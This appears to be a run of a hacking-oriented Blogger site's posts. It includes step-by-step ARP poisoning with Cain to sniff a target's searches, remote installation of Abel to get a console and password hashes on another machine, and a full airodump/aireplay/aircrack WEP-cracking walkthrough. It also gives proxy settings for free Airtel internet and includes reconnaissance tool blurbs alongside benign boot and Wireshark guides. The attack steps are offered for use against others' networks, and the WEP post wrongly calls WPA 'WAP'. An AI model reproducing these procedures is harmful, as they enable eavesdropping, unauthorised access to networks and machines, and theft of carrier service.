4) Now click on APR icon to enable it.<br />
<br />
5) Click on + and select IP address to poison, then OK.<br />
<br />
6) Now you should see it change from Idle to Poisoning.<br />
<br />
7) IP connections should appear from target and spoofing computer(your<br />
computer.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl1_pYIKVSkeFxaNQ_EmvQ9WOmmtfQhGVPWv0Dh9tfHCoTNkLKcbrv5qpLk9_PfetZUVHigPzFyclbqYXGHbaCpjodYbM6UZHeNytYM0XB3xSb5kzCp2CcIJc4n5-pitvhM-MqNISohdo/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="219" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl1_pYIKVSkeFxaNQ_EmvQ9WOmmtfQhGVPWv0Dh9tfHCoTNkLKcbrv5qpLk9_PfetZUVHigPzFyclbqYXGHbaCpjodYbM6UZHeNytYM0XB3xSb5kzCp2CcIJc4n5-pitvhM-MqNISohdo/s320/5.PNG" width="320" /></a></div>
<br />
8) So, what we have now, looking at C3, is the target IP on the left, where they<br />
were going on the right. All of this passing harmlessly through the middle<br />
PC.<br />
<br />
9) For better analysis of this traffic, and perhaps text strings that have been<br />
sent from the target, etc. (e.g. They connected to Google, but what did<br />
they search for?) We will run a sniffer on the middle computer.<br />
<br />
10) Start Ethereal, select Capture, then select the same interface adapter you<br />
selected in Cain. Then select OK. You are trying to capture the packets<br />
being forwarded to and from your machine via ARP session.<br />
<br />
11) Stop the capture after connecting to google and searching for items such as<br />
“vacation villas”, or “cheap air fare”. Your machine is now analyzing the<br />
traffic from a target as all of its traffic is rerouted through yours. Note in<br />
Figure C4 we see all traffic listed in the top window of Ethereal (examine<br />
that we see our connection to Google).<br />
<br />
12)Click the Protocol field to organize the list, then scroll down to HTTP and<br />
look for GET /search? Here we see in Figure C5 that the user was<br />
searching on vacation villas (vacation+villa).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk15cAbK3nLkwnTtDSPhCKlrTizKywJ-9AYLopMPacZ0Vn8MMvn213xmr3CjqDvb_YUAaBTBFg2-3pXO4ItivCp8rUdW8RH8eC9MQ6f8lq_YOx8I04H5ts0LonD6n2QjEtVv_oCjvys1M/s1600/12.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="101" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk15cAbK3nLkwnTtDSPhCKlrTizKywJ-9AYLopMPacZ0Vn8MMvn213xmr3CjqDvb_YUAaBTBFg2-3pXO4ItivCp8rUdW8RH8eC9MQ6f8lq_YOx8I04H5ts0LonD6n2QjEtVv_oCjvys1M/s320/12.PNG" width="320" /></a></div>
<br />
13)Click the Protocol field to organize the list, then scroll down to HTTP and<br />
look for GET /search? Here we see in Figure C5 that the user was<br />
searching on vacation villas (vacation+villa).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAmZg2dO20b2n1V5RreYQTGx_yfd1qoAiBv9IlFJ9Qk08IsOUqwY1caq8uuJD2Dlth6Hsqc2HBAB4uVVeB8Yb3ZJ0ymdukG5xaIYrQW-zJa4W7807mD5yE0ykLIWqGdboEwde-cbZMdSs/s1600/13.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="61" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAmZg2dO20b2n1V5RreYQTGx_yfd1qoAiBv9IlFJ9Qk08IsOUqwY1caq8uuJD2Dlth6Hsqc2HBAB4uVVeB8Yb3ZJ0ymdukG5xaIYrQW-zJa4W7807mD5yE0ykLIWqGdboEwde-cbZMdSs/s320/13.PNG" width="320" /></a></div>
<br />
14)When finished select Tools, Disconnect, Disconnect All.<br />
<b><br />
What is Abel?</b> How can I install it ?<br />
Abel is an NT service composed by two files: "Abel.exe" and "Abel.dll". These<br />
files are copied by the installation package into the program's directory but the<br />
service IS NOT automatically installed. Abel can be installed locally or<br />
remotely (using Cain), anyway you need Administrator privileges to do that.<br />
<br />
LOCAL INSTALLATION:<br />
1) Copy the files Abel.exe and Abel.dll into the %WINNT% directory (ES:<br />
C:\WINNT)<br />
<br />
2) Launch Abel.exe to install the service (not automatically started)<br />
<br />
3) Start the service using the Service Manager<br />
<br />
REMOTE INSTALLATION (most reliable on wired network):<br />
1) Use the "Network TAB" in Cain and choose the remote computer where Abel<br />
will be installed<br />
<br />
2) Right click on the computer icon in the tree and select "Connect As"<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbJOuL8OyOu5JH6CobVuxqaF7H0JoTGg4TC5jr-lpEqyurF3TCy2U_U4P4iTiwrGgyxHGuPWdAr9d2YTLseB4cqIKflQUmW2cmn33vyMMaDUQeDvoqSLRuiJaHLYvPhxrc92eR7aoaVTk/s1600/7.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbJOuL8OyOu5JH6CobVuxqaF7H0JoTGg4TC5jr-lpEqyurF3TCy2U_U4P4iTiwrGgyxHGuPWdAr9d2YTLseB4cqIKflQUmW2cmn33vyMMaDUQeDvoqSLRuiJaHLYvPhxrc92eR7aoaVTk/s320/7.PNG" width="320" /></a></div>
<br />
4) Provide Administrator credentials for the remote machine.<br />
<br />
5) Once connected right click on the "Services" icon and select "Install Abel"<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzXq-aFbHcCHp05mv3c_zXJiNM2Quj-T90NArfoeZuhnlREd-0EXk75XOs38rM3_nxX09h5tjQAPweKfVB9nG4YjMYm2-Kk19hlsBtImiokq8vUlC-zskvPQ5AeUwnuqT4J2CMPfdqBnw/s1600/8.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzXq-aFbHcCHp05mv3c_zXJiNM2Quj-T90NArfoeZuhnlREd-0EXk75XOs38rM3_nxX09h5tjQAPweKfVB9nG4YjMYm2-Kk19hlsBtImiokq8vUlC-zskvPQ5AeUwnuqT4J2CMPfdqBnw/s320/8.PNG" width="320" /></a></div>
<br />
6) The two files "Abel.exe" and "Abel.dll" will be copied into the remote<br />
machine, the service will be installed<br />
and started automatically.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM0c7UOcg3qQQEUZaoW7jIc-P2fgnVw8B4U6tnZ5MGl1B_5gxI2A0provlQhM93fk0GSVk03NW-fxVZsxxgJTK48SixBjjn8M_3TWirrhXWZ1P-yKCJtzttcvhe2EDJbZCvkea4HxuKvQ/s1600/9.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM0c7UOcg3qQQEUZaoW7jIc-P2fgnVw8B4U6tnZ5MGl1B_5gxI2A0provlQhM93fk0GSVk03NW-fxVZsxxgJTK48SixBjjn8M_3TWirrhXWZ1P-yKCJtzttcvhe2EDJbZCvkea4HxuKvQ/s320/9.PNG" width="320" /></a></div>
<br />
7) Once installed on the remote computer, note that among other things, you<br />
can bring up a console prompt on the remote machine, examine password<br />
Hashes, etc.</div>
Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com6tag:blogger.com,1999:blog-8450897627020793899.post-3032535388964772582012-09-08T22:16:00.002-07:002012-11-27T21:46:10.268-08:00How to reduce OS selection time in dual boot setup<div dir="ltr" style="text-align: left;" trbidi="on">
If your pc is in dual mode setup than you might have noticed that it gives you 30 seconds for selection if you are using any windows system. It is because windows boot manager is set for 30 sec as default time and you can edit it by editing boot manager file, it is possible by using 'system configuration utility' window. But here shown method only works for windows boot manager if you have Linux OS install alongside windows than it use another method.<br />
<br />
Open 'run' dialogue and type 'msconfig'<br />
<br />
click on 'boot' tab<br />
<br />
Here edit the 'Timeout' field, as default value is 30. You can decrease and increase it according to your need<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-UXuSQvg2lHs/T0dLy-W2DAI/AAAAAAAAALQ/Uoiu2S93GoE/s1600/msconfig.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://4.bp.blogspot.com/-UXuSQvg2lHs/T0dLy-W2DAI/AAAAAAAAALQ/Uoiu2S93GoE/s320/msconfig.jpg" width="320" /></a></div>
By editing options in msconfig you are modifying boot file also in xp you can do it directly by unhidding boot.ini which is in directory root C: and opening it in notepad.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-RyjHZgkrVhI/T0dN2l0U8wI/AAAAAAAAALY/NxnJei3RVbQ/s1600/boot.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="http://3.bp.blogspot.com/-RyjHZgkrVhI/T0dN2l0U8wI/AAAAAAAAALY/NxnJei3RVbQ/s320/boot.JPG" width="320" /></a></div>
As here you can see many things can be edited including the timeout field value.<br />
<br />
Also you can edit boot.ini from cmd, open cmd and type<br />
<br />
cd C:\<br />
<br />
attrib -r -a -s -h boot.ini<br />
<br />
edit boot.ini<br />
<br />
and can edit as you want or search for more editing commands in cmd.</div>
Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com4tag:blogger.com,1999:blog-8450897627020793899.post-85656846062874272472012-09-04T09:03:00.000-07:002012-12-11T19:45:43.076-08:00How to use wireshark to Capture, Filter and Inspect Packets<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSxU83m6zYdXYTij_UZeBVia-aooCDeK6UhJrkPL8EViNvHuBmLy_a6HKbmoaDU9c2NLYKB_y3PfHBZJh2lI_WMlYxtTjKswxhuH2Mh-_E3l9oBgK7z7LE60ykiS6k2EcADMmVuXpLcSg/s1600/Wireshark_Icon-150x150.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSxU83m6zYdXYTij_UZeBVia-aooCDeK6UhJrkPL8EViNvHuBmLy_a6HKbmoaDU9c2NLYKB_y3PfHBZJh2lI_WMlYxtTjKswxhuH2Mh-_E3l9oBgK7z7LE60ykiS6k2EcADMmVuXpLcSg/s1600/Wireshark_Icon-150x150.png" /></a></div>
<b>Start Wireshark</b><br />
On a Linux or Unix environment, select the Wireshark or Ethereal entry in the desktop environment's menu, or run "wireshark" (or "ethereal") from a root shell in a terminal emulator.<br />
Note that on Un*x systems, a non-GUI version of Wireshark called "tshark" (or "tethereal") may be available as well, but its use is beyond the scope of this document.<br />
<br />
Configure Wireshark<br />
<br />
After starting Wireshark, do the following:<br />
<br />
-Select Capture | Interfaces<br />
<br />
-Select the interface on which packets need to be captured.<br />
<br />
-If capture options need to be configured, click the Options button for the chosen interface. Note the following recommendations for traces that are to be analysed by Novell Technical Services:<br />
Capture packet in promiscuous mode: This option allows the adapter to capture all traffic not just traffic destined for this workstation. It should be enabled.<br />
<br />
Limit each packet to: Leave this option unset. Novell Support will always want to see full frames.<br />
<br />
Filters: Generally, Novell Support prefers an unfiltered trace. For documentation on filters, please refer to TID 10084702 - How to configure a capture filter for Ethereal (formerly NOVL90720).<br />
<br />
-Capture file(s): This allows a file to be specified to be used for the packet capture. By default Wireshark will use temporary files and memory to capture traffic. Specify a file for reliability.<br />
<br />
-Use multiple files, Ring buffer with: These options should be used when Wireshark needs to be left running capturing data data for a long period of time. The number of files is configurable. When a file fills up, it it will wrap to the next file. The file name should be specified if the ring buffer is to be used.<br />
<br />
-Stop capture after xxx packet(s) captured: Novell Technical Support would most likely never use this option. Leave disabled.<br />
<br />
-Stop capture after xxx kilobyte(s) captured: Novell Technical Support would most likely never use this option. Leave disabled.<br />
<br />
-Stop capture after xxx second(s): Novell Technical Support would most likely never use this option. Leave disabled.<br />
<br />
-Update list of packets in real time: Disable this option if the problem that's being investigated is occuring on the same workstation as where Wireshark is running.<br />
<br />
-Automatic scrolling in live capture: Wireshark will scroll the window so that the most current packet is displayed.<br />
<br />
-Hide capture info dialog: Disable this option so that you can view the count of packets being captured for each protocol.<br />
<br />
-Enable MAC name resolution: Wireshark contains a table to resolve MAC addresses to vendors. Leave enabled.<br />
<br />
-Enable network name resolution: Wireshark will issue DNS queries to resolve IP host names. Also will attempt to resolve network network names for other protocols. Leave disabled.<br />
<br />
-Enable transport name resolution: Wireshark will attempt to resolve transport names. Leave disabled.<br />
<br />
Now click the Start button to start the capture.<br />
<br />
Recreate the problem. The capture dialog should show the number of packets increasing. If not, then stop the capture. Examine the interface list and pick the one that is not associated with the WANIP. It will probably be a long alpha-numeric string. If packets are still not being captured, try removing any filters that have been defined.<br />
<br />
Once the problem which is to be analysed has been reproduced, click on Stop. It might take a few seconds for Wireshark to display the packets captured.<br />
<br />
If the destination address is always displayed as FFFFFFFF (IPX) or always ends in .255 (IP) then all that has been captured is broadcast traffic. This is a useless trace.<br />
<br />
This usually occurs when another machine is being traced (to start the trace while the target machine is powered off, in order to capture the bootup process). The capture setup needs to be reconsidered - port mirroring on the switch may need to be set up, or a dumb hub may need to be used to make the traffic reach the sniffing system. (Some devices advertised as "hubs" are in fact switches that may have the intelligence to prevent the workstations from seeing each other's packets; with these, getting a good trace may not be possible)<br />
<br />
Save the packet trace in any supported format. Just click on the File menu option and select Save As. By default Wireshark will save the packet trace in libpcap format. This is a filename with a.pcap extension. Use this default for files sent to Novell.<br />
<br />
Create a trace_info.txt file with the IP and MAC address of the machines that are being traced as well as any pertinent information, such as:<br />
<br />
<ul style="text-align: left;">
<li>What is the problem? (when did it start? steps to reproduce? any other pertinent information)</li>
<li>What steps were traced?</li>
<li>Give names of the servers and files being accessed.</li>
<li>If analysis of the trace has already been attempted, please provide Novell Support with analysis notes.For example: Packets 1-30 are boot. Packets 31-500 are login. Packets 501 to 1,000 is my application loading. Packet 1,001 to 1,500 is me saving my file. The error occurred at approximately packet 1,480.</li>
<li>Give the MAC addresses of hardware involved? (Workstation, servers, printers ...)</li>
<li>What is the workstation OS and configuration?</li>
<li>What version of client software is running?</li>
<li>If it works with one version of the client (or a particular server patch), then get a trace of it working, and a trace of it not working.</li>
<li>For Novell Client issues: Are there any client patches loaded?</li>
<li>For NetWare servers: What version of NetWare (and other relevant products i.e. ZEN or NDPS) are running on the server?</li>
<li>What patches have been applied?</li>
<li>What is the configuration of the network? Are there routers involved? If so, what kind of routers?</li>
</ul>
</div>
Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com8tag:blogger.com,1999:blog-8450897627020793899.post-81937189938510268702012-09-03T07:33:00.001-07:002012-11-27T21:55:50.637-08:00How to hack a wifi password using aircrack<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGRPId90uWXoyfW0q3vr4Pza9VXcxLNoHDbfZRNAtaUUaWjbaRaVLBa1bMWwWNa9RSME_GSzDh8fWL8XBh3fLe3gQHR8jqx_DgXnosuloupXtl1eYV4WFgxIJ_oJSrHwfM4JOsuEYdBcs/s1600/WiFi-Hacking-Risk.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGRPId90uWXoyfW0q3vr4Pza9VXcxLNoHDbfZRNAtaUUaWjbaRaVLBa1bMWwWNa9RSME_GSzDh8fWL8XBh3fLe3gQHR8jqx_DgXnosuloupXtl1eYV4WFgxIJ_oJSrHwfM4JOsuEYdBcs/s320/WiFi-Hacking-Risk.jpg" width="320" /></a></div>
First of all you need to scan for available wireless networks.<br />
<br />
you can use“NetStumbler” or "Kismet" for Windows and Linux and KisMac for Mac.<br />
<br />
It’ll also show how the Wi-fi network is encrypted. The two most common encryption techniques are:<br />
<br />
1) WEP (Wire Equivalent Privacy )<br />
<br />
2) WAP(Wireless Application Protocol)<br />
<br />
WEP allows a hacker to crack a WEP key easily whereas WAP is currently the most secure and best option to secure a wi-fi network<br />
<br />
It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary atack.<br />
<br />
How to Crack WEP<br />
<br />
To crack WEP we will be using Live Linux distribution called BackTrack to crack WEP.<br />
<br />
BackTrack have lots of preinstalled softwares but for this time<br />
The tools we will be using on Backtrack are:<br />
<br />
a)Kismet – a wireless network detector<br />
b)airodump – captures packets from a wireless router<br />
c)aireplay – forges ARP requests<br />
d)aircrack – decrypts the WEP keys<br />
<br />
Follow the steps One by One<br />
<br />
1) First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command iwconfig.<br />
<br />
2) To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode.<br />
<br />
3) In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Y=WEP N=OPEN 0=OTHER(usually WAP).<br />
<br />
4) Once you find an access point, open a text document and paste in the networks broadcast name (essid), its mac address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit to get more information about it.<br />
<br />
5) The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command:<br />
<br />
<span style="background-color: #eeeeee;">airodump-ng -c [channel#] -w [filename] –bssid [bssid] [device]</span><br />
<span style="background-color: #eeeeee;"><br /></span>
In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes after –bssid. The command ends with the device name. Make sure to leave out the brackets.<br />
<br />
6) Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command:<br />
<br />
<span style="background-color: #eeeeee;">aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]</span><br />
<br />
In the above command we are using the airplay-ng program. The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.<br />
<br />
7) Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. The command is:<br />
<br />
<span style="background-color: #eeeeee;">aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]</span><br />
<br />
In this command, the -3 tells the program the specific type of attack which in this case is packet injection, -b is the MAC address of the target access point, -h is your wireless adapters MAC address, and the wireless adapter device name goes at the end.<br />
Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:<br />
<br />
<span style="background-color: #eeeeee;">aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs</span><br />
<br />
In this command the -a 1 forces the program into the WEP attack mode, the -b is the targets MAC address,and the -n 128 tells the program the WEP key length. If you don’t know the -n , then leave it out. This should crack the WEP key within seconds. The more packets you capture, the bigger chance you have of cracking the WEP key.</div>
Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com14tag:blogger.com,1999:blog-8450897627020793899.post-4741381076591691062012-09-03T06:54:00.002-07:002012-11-27T21:49:17.838-08:00Free internet airtel hack for torrent files<div dir="ltr" style="text-align: left;" trbidi="on">
Just follow these steps,<br />
<br />
1. Download the <a href="http://www.mediafire.com/?v9li5uh0vg2pbsv">App mobtorrent 1.1 Handler ui</a> . <br />
<br />
<br />
2. Make new Settings In the Phone as Below<br />
<br />
APN: airtelgprs.com<br />
Proxy: 67.117.201.129<br />
Port: 80<br />
<br />
3. Install the app and insert the following settings in Handler menu.<br />
Front query: fb.me/cgi-bin/nph-proxy.cgi/000000A/http/<br />
Proxy type: Real Host<br />
Proxy server: 122.170.122.191<br />
<br />
4. Now Save the settings and Enjoy downloading the Files.</div>
Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com5tag:blogger.com,1999:blog-8450897627020793899.post-55378378545446145382012-09-03T06:49:00.000-07:002012-11-27T21:48:48.478-08:00Free internet on pc using airtel gprs<div dir="ltr" style="text-align: left;" trbidi="on">
For this you need to Download a Software Called<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi68RIcyL-Z-mIQAYyAweoOoanBX5BemeVyW5qLD4rVWjHj6RZ6dHEozWMe_mwLS-ba2glK5GB5SJGhihpY71iaP7nGhpxeFmER80aul8oO6wwg7EJ8bBuc9ZXc5Kd8ql9RH0MrRN4nbuU/s1600/CPROXY.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="257" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi68RIcyL-Z-mIQAYyAweoOoanBX5BemeVyW5qLD4rVWjHj6RZ6dHEozWMe_mwLS-ba2glK5GB5SJGhihpY71iaP7nGhpxeFmER80aul8oO6wwg7EJ8bBuc9ZXc5Kd8ql9RH0MrRN4nbuU/s320/CPROXY.png" width="320" /></a></div>
<br />
You Can Download It From here <br />
<br />
Now you need to register on Cproxy From here <br />
<br />
Just Fill Up Your Registration Data as Shown and choose you server as Prague-CZ,UDP:9201<br />
<br />
Now restart your Software.<br />
Now Connect you PC using airtelgprs.com and start Cproxy. Wait till it gets connected and now you are free to browse and download.<br />
<br />
IDM ( Internet Download Manager) Configuration:<br />
<br />
Go to proxy / socks<br />
Tick on proxy<br />
Fill As:<br />
Proxy server address: 127.0.0.1<br />
Port: 3128<br />
Mark http , https , ftp.<br />
<br />
Now You Are Free to download Using IDM.</div>
Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com3tag:blogger.com,1999:blog-8450897627020793899.post-32191033540649385672012-09-01T09:43:00.001-07:002012-11-27T21:33:28.109-08:00BackTrack applications for data collection TheHarvester<div dir="ltr" style="text-align: left;" trbidi="on">
TheHarvester is atool to collect e-mail accounts, names user and host names or subdomains from different public sources such as search engines and servers PGP key.<br />
<br />
This tool is intended to help penetration testers in the early stages of the project, is a very simple, but very effective.<br />
<br />
Sources support are:<br />
<br />
<ul style="text-align: left;">
<li>Google - emails, subdomains or hostnames</li>
<li>Google Profiles - the names of the employees</li>
<li>Bing - emails, subdomains or hostnames, virtual servers</li>
<li>Pgp servers, emails, subdomains or hostnames</li>
<li>Linkedin - The names of the employees</li>
<li>Exalead - emails, hostnames or subdomain</li>
</ul>
<br />
<br />
New features:<br />
<br />
<ul style="text-align: left;">
<li>The delays between requests</li>
<li>Results XML and HTML export</li>
<li>Search a domain in all sources</li>
<li>Checker virtual host</li>
<li>Shodan computer database integration</li>
<li>Enumeration of active (DNS enumeration, reverse DNS lookups, DNS TLD expansion)</li>
<li>Chart statistics</li>
</ul>
<br />
<br />
<div class="separator" style="background-color: white; clear: both; color: #555555; font-family: Cousine; font-size: 13px; line-height: 18px; text-align: center;">
<a href="http://i48.tinypic.com/25qsnmb.png" imageanchor="1" style="color: #c95f5f; margin-left: 1em; margin-right: 1em; outline: none; text-decoration: none;"><br class="Apple-interchange-newline" /><img border="0" src="http://i48.tinypic.com/25qsnmb.png" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; padding: 0px; position: relative;" /></a></div>
<div style="background-color: white; color: #555555; font-family: Cousine; font-size: 13px; line-height: 18px;">
</div>
<br />
<span style="background-color: #eeeeee;">cd /pentest/ Enumeration / theharvester</span><br />
<span style="background-color: #eeeeee;">/ Pentest / enumeration / theharvester #. / TheHarvester.py</span><br />
<span style="background-color: #eeeeee;">/ Pentest / enumeration / theharvester #. / Nasa.gov theHarvester.py-d-l 500-b google</span><br />
<br />
<div class="separator" style="background-color: white; clear: both; color: #555555; font-family: Cousine; font-size: 13px; line-height: 18px; text-align: center;">
<a href="http://i49.tinypic.com/716aud.png" imageanchor="1" style="color: #c95f5f; margin-left: 1em; margin-right: 1em; outline: none; text-decoration: none;"><img border="0" src="http://i49.tinypic.com/716aud.png" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; padding: 0px; position: relative;" /></a></div>
<br />
<b>Downloads</b><br />
The latest version can always be found in the reservoirsiteGoogle code: <a href="https://code.google.com/p/theharvester">https://code.google.com/p/theharvester</a></div>
Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com5tag:blogger.com,1999:blog-8450897627020793899.post-74608159154827070782012-09-01T02:43:00.001-07:002012-11-27T21:34:55.729-08:00Download Mantra-Web Browser With Hacking Tools<div dir="ltr" style="text-align: left;" trbidi="on">
Mantra is a collection of tools of free and open source integrated into abrowser web, which can be handy for students, Penetration testing, web application developers, security professionals etc. It is portable , ready-to-run, compact and follows the true spirit of free and open.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX7Q72jeIcCYApkyOAGLVhCk8C1Br5Gptpvp2cBW6j1rRSPkdd2VUoTcnEpXFSw32feuwdMHGFLsMMBcqIsyBy_JRtHgsPExbemkGYp4OFiG71hLgfn0UoZn4QinwNmn_Fxxo8SPyxeVBx/s1600/000.jpg" imageanchor="1" style="background-color: white; border-style: none; color: #9b0505; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 1em; margin-right: 1em; margin-top: 0px; outline: none; padding: 0px; text-align: center; text-decoration: none;"><img border="0" height="143" original="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX7Q72jeIcCYApkyOAGLVhCk8C1Br5Gptpvp2cBW6j1rRSPkdd2VUoTcnEpXFSw32feuwdMHGFLsMMBcqIsyBy_JRtHgsPExbemkGYp4OFiG71hLgfn0UoZn4QinwNmn_Fxxo8SPyxeVBx/s320/000.jpg" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX7Q72jeIcCYApkyOAGLVhCk8C1Br5Gptpvp2cBW6j1rRSPkdd2VUoTcnEpXFSw32feuwdMHGFLsMMBcqIsyBy_JRtHgsPExbemkGYp4OFiG71hLgfn0UoZn4QinwNmn_Fxxo8SPyxeVBx/s320/000.jpg" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; background-color: black; border: none; box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; margin: 0px; max-width: 575px; outline: none; padding: 0px; position: relative;" width="320" /></a></div>
<br />
The software is intended to be lighted, flexible, portable and easy to use with a nice GUI. It can lead to memory cards, flash drives, CD / DVDs, etc. can run natively onLinux, Windows and Mac can also be installed on yoursystemin minutes. Mantra is absolutely free and takes no time for you to understand. Mantra can be very useful in performing the five phases of attacks including reconnaissance, scanning and enumeration, access, privilege escalation, the maintenanceaccess, and covering tracks.<br />
<br />
Apart from that it also contains a set of tools aimed at web developers and code debuggers which makes it useful for both offensive and defensive security related tasks safely. Objectives of the project to create an ecosystem-based hackers the browser to draw people's attention to the potential safety of a platform , browser-based security provide an easy to use and portable to demonstrate common attacks based on the web (read training) To associate with other security tools / products for a better environment .<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidv5Lw2cGNDRm4qVLFzqRSpgNi_kjTyiXJ8wkyLViammf88hW-RCSbhkx4wyYqC5TpCIIfNQQrOcCS_VCiGANaVuJuQwQeG5tsUUwcrUucNu_eepbob7D0RTpoq-JjRUoldnq0VPP87qI/s1600/Mantra-Security-Toolkit_5.jpg" style="background-color: white; border-style: none; color: #9b0505; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 1em; margin-right: 1em; margin-top: 0px; outline: none; padding: 0px; text-align: center; text-decoration: none;"><img border="0" height="210" original="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidv5Lw2cGNDRm4qVLFzqRSpgNi_kjTyiXJ8wkyLViammf88hW-RCSbhkx4wyYqC5TpCIIfNQQrOcCS_VCiGANaVuJuQwQeG5tsUUwcrUucNu_eepbob7D0RTpoq-JjRUoldnq0VPP87qI/s400/Mantra-Security-Toolkit_5.jpg" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidv5Lw2cGNDRm4qVLFzqRSpgNi_kjTyiXJ8wkyLViammf88hW-RCSbhkx4wyYqC5TpCIIfNQQrOcCS_VCiGANaVuJuQwQeG5tsUUwcrUucNu_eepbob7D0RTpoq-JjRUoldnq0VPP87qI/s400/Mantra-Security-Toolkit_5.jpg" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; background-color: black; border: none; box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; margin: 0px; max-width: 575px; outline: none; padding: 0px; position: relative;" width="400" /></a></div>
<br />
<br />
<b><u>Download</u></b>: <br />
